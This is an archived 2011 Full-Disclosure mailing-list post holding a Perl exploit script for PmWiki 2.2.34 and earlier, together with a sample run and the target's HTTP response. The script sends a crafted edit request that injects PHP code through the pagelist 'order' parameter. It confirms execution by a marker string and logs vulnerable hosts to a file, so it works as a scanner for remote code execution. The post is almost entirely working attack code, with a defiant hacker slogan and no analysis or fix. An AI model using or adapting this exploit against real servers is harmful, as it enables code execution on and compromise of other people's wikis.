lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <DUB101-W28EA6EE10219F3D9F1BEC1D6A30@phx.gbl>
Date: Thu, 15 Dec 2011 17:49:18 +0200
From: foo net <foonet@...mail.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: PmWiki <= 2.2.34 (pagelist)


$ perl test.pl http://x.x.x.x/pmwiki/pmwiki.php
(@)OK:http://x.x.x.x/pmwiki/pmwiki.php
HTTP/1.1 200 OK
Connection: close
Date: Thu, 15 Dec 2011 15:40:59 GMT
Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8r DAV/2 PHP/5.3.6
Content-Length: 17
Content-Type: text/html
Client-Date: Thu, 15 Dec 2011 15:40:58 GMT
Client-Peer: x.x.x.x:80
Client-Response-Num: 1
Set-Cookie: author=deleted; expires=Wed, 15-Dec-2010 15:40:58 GMT; path=/
X-Powered-By: PHP/5.3.6

ZmEu 0.1 - pmwiki <-- work/got it...
$ 

Huh..

$ cat test.pl
#!/usr/bin/perl -w
#
# *** Autor: ZmEu
# *** Multumiri: haxnet, foonet si blackhat(s).
# *** Testat pe: Mac(darwin 8.11.0).
#
# \"You may stop me, but you can\'t stop us all.\".
#

use LWP::UserAgent;

my $adresa=$ARGV[0] or die("(@)Se foloseste: perl pmwiki.pl http://victima.tld/pmwiki/pmwiki.php\n");
my $incarca="chr%2890%29.chr%28109%29.chr%2869%29.chr%28117%29.chr%2832%29.chr%2848%29.chr%2846%29.chr%2849%29.chr%2832%29.chr%2845%29.chr%2832%29.chr%28112%29.chr%28109%29.chr%28119%29.chr%28105%29.chr%28107%29.chr%28105%29";

$ua=new LWP::UserAgent;
$ua->agent("ZmEu/1.0");

my $pmwikireq=new HTTP::Request POST => $adresa;
        $pmwikireq->content_type("application/x-www-form-urlencoded");
        $pmwikireq->content("action=edit&n=Cmd.foo&text=%28%3Apagelist+order%3D%27%5D%29%3Berror_reporting%280%29%3Bprint%28$incarca%29%3Bdie%3B%23%3A%29&csum=&author=foo&preview=+Preview+");

my $pmwikires=$ua->request($pmwikireq);
my $zmeu=$pmwikires->as_string;

if($zmeu=~/ZmEu 0.1 - pmwiki/)
{
        print "(@)OK:$adresa\n";
        open(PMWIKIVULN, ">>vuln.txt");
        print PMWIKIVULN ("$adresa\n");
        close PMWIKIVULN;
}
else
{
       print "BAD:$adresa\n"; #este nevoie de parola.
}
$ 
 		 	   		  
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ